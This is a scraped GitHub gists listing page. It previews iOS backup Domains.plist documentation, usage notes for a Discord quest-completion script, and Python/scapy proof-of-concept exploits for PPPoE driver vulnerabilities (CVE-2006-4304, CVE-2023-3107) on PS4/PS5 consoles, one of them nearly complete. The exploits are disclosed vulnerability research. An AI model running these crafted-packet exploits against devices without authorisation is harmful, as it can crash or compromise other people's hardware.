Skip to content

Instantly share code, notes, and snippets.

View lewiwiii's full-sized avatar
💨

lewiwiii

💨
2 followers · 96 following
View GitHub Profile
@leminlimez
leminlimez / Domains.md
Last active April 8, 2025 02:20
A deep dive into the iOS backup/restore system

Domains.plist

Documentation of /System/Library/Backup/Domains.plist. File taken from iOS 16.4 iPhone SE 3. The file was removed in iOS 17.0

Values

Values in the plist. Other than SystemDomains, these are not really important and are just here for preservation sake.

A domain in domains.plist contains keys that determine what gets backed up for what types of devices and where (i.e. iCloud vs iTunes). Not all domains have each key. The only 2 keys that must be in every domain are RootPath and RelativePathsToBackupAndRestore. Some domains have the value ShouldDigest. I am not sure exactly what it means but I have included it for documentation purposes.

  • Version: "24.0"
  • SystemDomains: (Dictionary), see below
@aamiaa
aamiaa / CompleteDiscordQuest.md
Last active April 15, 2025 18:49
Complete Recent Discord Quest

Complete Recent Discord Quest

Note

This does not works in browser for non-video, non-activity quests! For stream/play quests use the desktop app!

Note

When doing stream quests, you need at least 1 other account in the vc!

How to use this script:

  1. Accept a quest under Discover -> Quests
@lewiwiii
lewiwiii / PoC of CVE-2023-3107 for PS4.py
Last active April 10, 2024 10:41
# This software is licensed under the GNU Affero General Public License (AGPL) version 3.0 or later.
# For more details, see <https://www.gnu.org/licenses/agpl-3.0.html>.
from scapy import all as sp
import sys
import random as rn
iface = sys.argv[1]
src_mac = sp.get_if_hwaddr(iface)
@iMrDJAi
iMrDJAi / CVE-2006-4304.py
Last active August 9, 2024 11:33
My implementation of a proof of concept for the `CVE-2006-4304` sppp driver vulnerability that affected PS4/PS5 and earlier versions of FreeBSD/NetBSD
from scapy.all import sniff, sendp
from socket import *
import time
# Replace with your PS4/5's MAC address.
dst_mac=b'\xaa\xbb\xcc\xdd\xee\xff'
# Replacing source MAC address is not mandatory
src_mac= b'\xab\xcd\xef\xab\xcd\xef'
# Replace this with your computer's ethernet interface name
iface_name = 'Ethernet'
@RobbedColek
RobbedColek / PS4-PS5-CVE-2006-4304.py
Created January 30, 2024 16:02
PoC of CVE-2006-4304 for PS4/PS5
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump
source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux
packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)